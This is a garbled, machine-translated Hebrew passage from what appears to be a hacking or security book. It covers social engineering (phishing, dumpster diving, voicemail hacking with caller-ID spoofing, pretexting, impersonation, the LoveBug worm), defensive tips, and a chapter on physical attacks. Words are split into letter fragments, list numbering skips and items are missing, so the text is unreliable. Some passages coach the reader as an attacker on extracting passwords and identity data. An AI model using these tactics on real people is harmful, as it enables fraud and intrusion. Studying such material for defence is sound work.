א ב ט חת מידע
כ ל עוד אתהי כו ל ל ק ב ל גי שה ל סוגים א לה ש ל אנ שים ,אז אתהי כו ל ב ק לות ל ח ט ט ב כ ל מידע שאתה רוצה לה שיג מ ב לי
להתאמץיותר מדי .ע לידי הי כו לת לאתר את סוגי המ שתמ שים ה ל לו ב כ ל ארגון ,תו כ ל ל ק ב ל נתוניםי קרי ערך כ כ ל שתו כ ל
כאי לו הייתה לך גי שה ל כ ל המ כ שירים הממו קדים.
Machine Translated by Google
סוגי הת קפות הנד סה ח ברתית
לה לן כמה מההת קפות הנפוצות ביותר המ שמ שות מהנד סים ח ברתיים כדי ל ק ב ל מהמ שתמ שים את המידע שהם רוצים:
1.פי שינג
ברגע שמהנד ס ח ברתי מגדיר את סוג המידע שהוא רוצה להוציא ממ שתמ ש ,הוא מת חי ל לא סוף כמה שיותר מידע
ע ל מ טרה מ ב לי להפעי ל אזע קה .לדוגמה ,אם מהנד ס ח ברתי מעוניין ל חדור למער כת הא ב ט חה ש ל הארגון ,ס ביר
להני ח שהואיצ טרך ל ק ב ל ר שימה ש ל עו בדים שעו בדים בו ,מ ספר מ ספרי ט לפון ב שימו ש פנימי או לו ח פעי לויות
המ שמ ש את ה ח ברה .באמצעות כ ל המידע הזה הואי כו ל לצאת לת קיפה ביום ש בו נמצאים ה כי פ חות אנ שי
א ב ט חה ,לע שות ת קיפה ש ל מהנד ס ח ברתי נגד אנ שי מפת ח דרך קו ת ק שורת ה כי פ חות ח שוד.
י ש הר בה דר כים כיצד ניתן ל בצע הת קפת דיוג .אפ שר לה שתמ ש ב ח ש בון אימיי ל מזויף או במ ספר ט לפון ו להעמיד
פנים שהוא מפ ק ח המ ב ק ש לר שימת אנ שי ק שר ר שמית .אפ שר גם לה סת כ ל ע ל ח ש בונות מדיה ח ברתית ש ל ארגון
ממו קד ו למצוא מי צפוי להיות א חראי ע ל ארגון לו חות הזמנים ש ל ה ח ברה .אם מהנד ס ח ברתי מעדיף לה ש קיע
פ חות זמן במ ח קר ש לו ,הואי כו ל פ שו ט ל ב חור ל ש לם ע בור בדי קת ר קע מ קיפה ע ל אנ שים ממו קדים באינ טרנ ט.
ברגע שהמידע הדרו ש מת ק ב ל ,מהנד ס ח ברתיי כו ל להפעי ל מת קפת פי שינג מ קיפהיותר
א חת ה ט ק טי קות היעי לות ביותר להנד סה ח ברתית בה מ שתמ שים הא קרים היא להגיע למ טרה ו להעמיד פנים
ש ח ש בון ש ל קור בן נפרץ .ע לידייצירת ת חו שת ד חיפות ,כ ל מהנד ס ח ברתי ע שוי להעמיד פנים שהוא מציע סיוע
ע לידי ב ק שת מידע חיוני כגון שם נעוריה ש ל האם ,תאריך לידה ,פרו טו קו לי ש חזור ח ש בון וה סי סמה הא חרונה
ש בה נע שה שימו ש.יעד צנוע ע שוי ל ספ ק את כ ל הנתונים ה ל לו מ ב לי לוודא עם מי הוא מד בר ,או אם ה ח ש בון ש לו
באמת נפרץ.
2.צ לי לת א שפה
אמנם שי טה זוי כו לה להיות מע ט מ בו לגנת ומ סו כנת ,אך חיפו ש ב חומרים ש ל ה ח ברה שנזר קהי כו ל להיות דרך
יעי לה מאוד ל ק ב ל מידע סודי ביותר .כפי שה שם מרמז ,זה כרוך לעתים קרו בות ב חי טו ט בפ חי א שפה ש ל ארגון,
בת קווה למצוא מ סמ כי מפת ח בפ ח.
שי טה זויעי לה מאוד מ כיוון שרו ב האנ שים מאמינים שהד ברים שהם זור קים לפ ח הם ב טו חים ,וזה כו ל ל מ סמ כים
המצ ביעים ע ל כתו בות ה בית ש להם ,מ ספרי ט לפון אי שיים וניירת סודית .אנ שים פ שו ט לא חו ש בים שי ש שפע ש ל
מידע זמין במ סמ כים שהם זור קים לא חר ש סיימו עם זה .מ סי בה זו ,ניתן למצוא ב ק לות את הד ברים ה באים בפ ח
הא שפה:
דיוו חים
תדפי סי מיי ל
מדיניות א ב ט חה פנימית
מ ספרי ט לפון
דיאגרמות ר שת
ז כור כיי שנם כמה מהנד סים ח ברתיים מ סורים שעדיין מוצאים ערך במ סמ כים מגוררים ש כן הם מ כירים ב כך
שניירת מגוררת מ כי לה מידע שארגון לא רוצה שאף א חדיג לה .בהינתן מ ספי ק זמן ו ק ל טת ,כ ל הא קריו כ ל ל ח בר
מ סמך מגורר ברי שו ל.
3.חפירת תא קו לי
זוהי ט ק טי קה המ שמ שת מהנד סים ח ברתיים כדי לג לות פר טים מעמי קים ואו לי מידע פר טי ע ל אדם ע לידי ניצו ל
פ שו ט ש ל ת כונת ה חיוג לפי שם המו טמעת ברו ב ההודעות ה קו ליות .כדי לה קי ש ע ל ת כונה זו ,כ ל מה שאתה צריך
הוא ל חייג 0לא חר הת ק שרות למ ספר ש ל ח ברה או מיד לא חר שהגעת לתי בת הדואר ש ליעד .זה נע שה בדרך כ ל ל
לא חר שעות הע בודה כדי לוודא שאף א חד בארגון לאיהיה זמין לענות ל שי חה.
הדואר ה קו לי מ כי ל בדרך כ ל ל שפע ש ל מידע פר טי ,כמו מ קרים ש בהם אדם אינו זמין ,וזה חיוני ב כ ל הנוגע לתזמון
ת קיפה כו ל לת .ח ל קם גם מ שתמ שים במידע שהם מוצאים בהודעות הדואר ה קו לי כדי לג לות כמה פר טים שהם
י כו לים לה שתמ ש בהם כדי להת חזות לאנ שים הא לה ו לה שתמ ש באי שיות ש להם כדי לפתו ח במת קפה.
מהנד סים ח ברתייםי כו לים ב ק לות לה סתיר את זהותם ומי קומם ב כ ל פעם שהם מ קי שים ע ל הודעות קו ליות ע לידי
שימו ש ב שרתי VoIPכגון Asteriskכדי להזין כ ל מ ספר ט לפון שהם רוצים ב כ ל פעם שהם מת ק שרים.
א חד האמצעים היעי לים ביותר לה שיג מידע באמצעות הנד סה ח ברתית הוא ל ב ק ש מהיעד את המידע הדרו ש
י שירות .כדי שה ט ק טי קה הזו תע בוד ,כ ל מה שמהנד ס ח ברתי צריך לע שות הוא ל בנות מ ספי ק אמון בינו ל בין היעד
ע ל מנת לה שיג את המידע שהוא צריך מ ב לי להית ק ל בהתנגדות כ ל שהי.
לדוגמה ,מהנד ס ח ברתי ע שוי להו בי ל קור בן הי שר למ קום ש בו נמצאת המער כת שהוא רוצה להפר .הוא ע שוי
ל ק ב ל זהות א חרת ,כגון מנה ל או אנ שי IT,ו להמ שיך ל שאו ל שא לות שע לו לות ל ס כן ק שות את ה ח ש בון האי שי ש ל
אדם או ל ח שוף פרו טו קו לי א ב ט חת ר שת חיוניים .אתה ע שוי להיות מופתע מ שפע המידע שאתהי כו ל ל ק ב ל
Machine Translated by Google
מתוך אנ שים פ שו ט ל שאו ל!
5.זיוף
ה ט כנו לוגיה הופ כת את ההנד סה ה ח ברתית ל ק להיותר ע לידי מי סוך הזהות ש ל האדם ע ל מנת להעמיד פנים
שהוא מי שהו שמיעדיםי כו לים לזהות אותו כא חד מ ש להם .אתהי כו ל ב ק לות ל ב ק ש ממ שתמ ש ל ש לו ח כ ל סוג ש ל
מידע סודי ע לידייצירת אימיי ל מ קצועי ו לגי טימי למראה המ ב ק ש מ ספרי תעודת זהות ,מזהי מ שתמ ש ואפי לו
סי סמאות .ח ל ק מהמ שתמ שים אפי לו מנד בים מידע סודי זה בתמורה ל סי סמת Wi-Fiב חינם ,או מתנה בתמורה.
אתהי כו ל אפי לו לה שתמ ש במיי לים מזויפים כדי ל ב ק ש ממ שתמ ש להת קין במ ח ש ב ש לו תי קון שי כו ל ל שמ ש כמ כ שיר
האזנה או כווירו ס.
א חת ההת קפות הפופו לריות ביותר המ שתמ שות ב טרי ק הזה היא תו לעת LoveBugשמ שתמ שים הת קינוי שירות
לתוך המער כות ש להם פ שו ט ע לידי פתי חת קו בץ מצורף במיי ל שאמור ל ח שוף את זהותו ש ל מעריץ סודי .למרות
שזה או לי נראה ברור מדי ש לפתו ח הת ק שרות מאדם שאינך מ כיר זה לא הגיוני ,אנ שים נפ לו בפ ח הזה ב כ ל מ קרה.
Machine Translated by Google
מה אתהי כו ל לע שות נגד הנד סה ח ברתית
הנה כמה ד ברים שאתהי כו ל לע שות כדי למנוע ליפו לי שר לתוך מ ל כודת הנד סה ח ברתית ,או למזער כ ל נז ק שנגרם ע לידי
כ ל מת קפת הנד סה ח ברתית:
כ כ ל שה ח ש בונות ש לך ת לוייםיותר זה בזה ,כך אתה פגיעיותר להת קפה .ודא שאתה נמנע מ לה כני ס את כ ל
ה ביצים ש לך ל ס ל א חד -א ל ת שתמ ש ב ח ש בון דוא" ל א חד בעת אימות ח ש בונות א חרים ש בהם אתה מ שתמ ש ,או
ה שתמ ש בדוא" ל נפרד ל ש חזור סי סמה.
2. ה שתמ ש ב כני סות שונות ע בור כ ל ח ש בון ש בו אתה מ שתמ ש וודא שה סי סמאות ש לך מאו ב ט חות
ודא ש לעו לם לא מ קפיד לה שתמ ש ב סי סמהיותר מפעם א חת .ברו ח דומה ,דאג שאתה מ שתמ ש גם ב סי סמאות
ש ק שה מאוד לנ ח ש.
ה שתמ ש במ כ שיר א חר או ב ח ש בון א חר בעת אימות ה ח ש בונות ש לך -זה מ ק שה ע ל גנ בים ל ח טוף את ה ח ש בונות
ש לך.
א ל ת לך ע ל ה שא לות והת שו בות ה ברורות כ שזה מגיע ליצירת שא לות א ב ט חה ע בור ה ח ש בונות ש לך .ודא ש ק שה
לנ ח ש את כ ל שא לות הא ב ט חה והת שו בות.
אם אתה צריך ל קנות באינ טרנ ט או לה שאיר פר טי בנ ק באתר לצורך נו חות הגי שה ,ה קפד ל בדו ק את פרו טו קו ל
הא ב ט חה ש ל האתר .באותה צורה ,דאג ש לא ת שתמ ש ב כר טי סי חיו ב בעת ביצוע ר כי שה -ברגע שמידע ה בנ ק ש לך
מתג לה ע לידי מהנד ס ח ברתי ,זה מאוד מ ק ל ע ליו לרו קן את כ ל ח ש בון ה בנ ק ש לך ברגע שהוא מ שי ק אפ ק טי בי
מת קפת דיוג.
6. שים ל ב תמיד לנתונים האי שיים ש לך ו ל ח ש בונות ש בהם אתה מ שתמ ש
ה קפד ל בדו ק באופן ק בוע את הפעי לויות ב כ ל ה ח ש בונות ש לך .אםי ש לך ח ש בון מדיה ח ברתית שאינך מ שתמ ש בו
יותר ,מ ח ק אותו כדי למנוע ה שארת ח ש בון פגיע שע לו ל להיפרץ מ כיוון שאינך בוד ק אותו באופן פעי ל מעת לעת.
י חד עם זאת ,ה קפד ל בדו ק באופן ק בוע את כ ל ח ש בונות ה בנ קאות המ קוונים והמיי לים כדי לראות אם בוצעה
פעי לות ח שודה או ני סיון דיוג.
Machine Translated by Google
7. דאג לה סיר את המידע ש לך ממאגרי מידע צי בוריים
מ סדי נתונים צי בוריים הם מר כז ע שיר ש ל מידע ע בור הא קרים -בעוד שאתה ע שוי ל ח שו ב ש להימצא באינ טרנ ט זה
טו ב לר שתות אי שיות ,כ ל הפר טים שאתה מ שאיר בר שת העו למית מאפ שרים למהנד סים ח ברתיים לזהות אותך
כיעד .מ סי בה זו ,ה קפד ל שמור את כ ל המידע האי שי ,כגון מי קום המ שרד ,מ ספרי ט לפון ,ואפי לו כתו בות דואר
א ל ק טרוני הר ח ק מעיני הא קר.
אם אתה צריך לזרו ק כ ל פרי ט שע שוי לה כי ל מידע כ ל שהו ע ליך ,דאג להרו ס אותו ל ח לו טין כדי להימנע מ כ ל
הת קפת הנד סה ח ברתית באמצעות צ לי לה לא שפה.
הדרך ה טו בה ביותר להימנע מ להיות מ טרה ש ל מהנד סים ח ברתיים היא להיות ספ קנות בריאה ו להפעי ל ערנות ,במיו חד
כא שר אתה מת ב ק ש למ סור מידע פר טי .ז כור ש ב כ ל פעם שאתה מת ב ק ש למ לא טופ ס או אפי לו ל ספ ק פר ט ש ל כאורה לא
סודי ל כ ל א חד ,א לא אם אתהי כו ל לאמת את זהות מי שפונה א ליך.י חד עם זאת ,ז כור שאפי לו מנה לים ,אנ שי ITאו עמיתים
לע בודה אינם אמורים לדעת מהן ה סי סמאות ש לך.
נהג באותה זהירות כא שר אתה מ ספ ק גי שה למ כ שירים ש לך או ל כ ל מ קום ליד המער כת שע ליה אתה מת כוון להגן .ודא ש כ ל
אדם שמת קר ב ל ט לפונים ,ה טא ב ל טים או ת חנות הע בודה ש לך הוא אנ שים שאתה מ כיר.
Machine Translated by Google
Machine Translated by Google
Machine Translated by Google
פר ק 11:הת קפות פיזיות
בעוד שהנד סה ח ברתית היא ט ק טי קה שנמצאת ב שימו ש נר ח ב ע לידי הא קרים כדי לה שיג מידע ע לידי מניפו לציה ש ל
מ שתמ ש ל ח שוף מידע אי שי ,הת קפה פיזית היא דרך ערמומית עודיותר ל ק ב ל גי שה למער כת .הת קפה זו כרו כה ב ק ב לת
גי שה פיזית למ כ שיר כדי לגנו ב או להתפ שר ע ל נתונים לרוו ח אי שי.
Machine Translated by Google
למה הת קפות פיזיות עו בדות
רו ב האנ שים בא ב ט חת ט כנו לוגיית המידע מאמינים ש כ ל עוד הם שמרו ע ל הר שתות ש להם ,מריצו מ ספר סרי קות ביום או
דואגים שי ש להם את התו כנה הנ כונה הם מוגנים מ כ ל הת קפה .עם זאת ,אמונה זו ע לו לה לגרום ל בעיות ר בות ב כ ל הנוגע
להגנה ע ל מער כת ש למה מפני פריצה .מ כיוון שי שיותר מדי אנ שי ITשמאמינים שתפ קידם לוודא שהם מ בצעים את
ה סרי קות הנ כונות ביום,יית כן שהם לעו לם לאיצפו להת קפה פיזית.
מער כת ע לו לה ל ס בו ל מהת קפה פיזית מ כוונת כא שר מ שתמ ש נו כ ל מ ק ב ל גי שה למ כ שיר מוגן וממ שיך ל בצע הת קפה .כ ל
עוד הא קר מ ק ב ל גי שה פיזית ל כ ל ד בר שי ש לו מ ח ש ב או תו כנת מ ח ש ב ,אתהי כו ל לה ב טי ח שיהיה הפ סד עצום בצד ש ל
ה קור בן.
אמנם ת קיפה פיזית ע שויה להיראות מ סו כנת מ כדי ל בצע אותה ,א ב ל היא עו בדת כמו ה טרי ק הי שן ש ל ב חירת מנעו לים -
ברגע שאתהי כו ל לע בור א ב ט חה פיזית ,אתהי כו ל ב ק לות להת קין מ כ שיר האזנה ,לג שת ל שורת פ קודה מר חו ק שתאפ שר
לך ל ש לו ט במער כת המ ח ש ב ש ל המ כ שיר ממר ח ק ב טו ח ,לפרוץ מ כ שירים א חרים המ חו ברים א ליו ועוד הר בהיותר.
Machine Translated by Google
גי לוי פגיעויות
ת קיפה פיזית היא ת קיפה ש כמע ט מו ב ט חת שתע בוד ,ויי ק ח להא קר מיומן ר ק כמה ד קות ל ש לו ט במ כ שיר או ל ק ב ל את
הנתונים הדרו שים לו ממער כת שהוא מ סוג ל לג שת א ליה .מ סי בה זו ,ח שו ב מאוד שתהיו מודעים לפגיעויות הפיזיות האפ שריות
ש ל המער כת ע ליה אתם מגנים.
4.מי קום מר כזי נתונים ב בניין ,כמו גם מו קדים אפ שריים נו ספים ש ל מידע סודי
כא שר אתה מ סת כ ל ע ל הר שימה לעי ל ,אתהי כו ל או לי לדמיין שי ש א לפי הפרות אפ שריות ש ל א ב ט חה פיזית שע לו לות
ל קרות .אם אתהי כו ל ל ח שו ב איך ע בריין אפ שריי כו ל לה שיג גי שה פיזית ל ח ל ק בודד ש ל מער כת המ ח ש ב שאתה מת כוון
להגן ע ליו ,אזית כן מאוד שהא קרים פ לי ליים חו ש בים אותו ד בר.
Machine Translated by Google
א ב ט חת הפריפריה
כדי לה ב טי ח את ה ב טי חות הפיזית ש ל המ כ שירים ש לך ,ה קפד לצמצם או להימנע מהפגיעויות ה באות:
3.עו בדים המאפ שרים למ ב קרים לג שת מיידית ל בניין כא שר נאמר להם שהם עו בדים ע בור המ שרד או ע בור ספ ק
6.חדרי מ ח ש ב ל לא הג ב לת גי שה
8.מידע רגי ש במ סמ כים או בדי ס קים בפ ח שאינם מגוררים גרו סים ב קפידה
9.חומרה לא מאו ב ט חת כגון מ ח ש בים ניידים ,מ כונות צי לום ,ט לפונים או טא ב ל טים
כא שר א חת או שתיים מה חו ל שות ה ל לו קיימות ,אתהי כו ל להיות ב טו ח שהמער כת שאתה רוצה לא ב ט ח מועדת מאוד
להת קפה פיזית .כדי למנוע את זה ,תצ טרך לוודא ש כ ל המ סמ כים ,ההת קנים או ר כזות המידע שי ספ קו פר טים נו ספים ע ל
נ קודות התורפה ש ל המער כת ש לך מאו ב ט חים.
זה גם הגיוני להגן ע ל המער כת ע לידי הג ב לת גי שה ל ח ש בונות ומער כות מנה לים -ודא שמפת חות ו סי סמאות אינם נגי שים
ל כ ל המ שתמ שים .כמו כן ,ה קפד ל בדו ק באופן שו טף את כ ל המ כ שירים שניג שים א ליהם ו לראות אם בוצעו שינויים בתו כנה
ו ב חומרה.
שימו ל ב שהת קפות פיזיות ע לו לות להתר ח ש לאורך זמן -עו בד נו כ ל ע שוי לה שתי ל לא ט לא ט מ כ שירי האזנה או לה ח לי ש את
פרו טו קו לי הא ב ט חה כך שהר שויות לאי שימו ל ב מיד כ שמ שהו לא ב סדר קורה.
Machine Translated by Google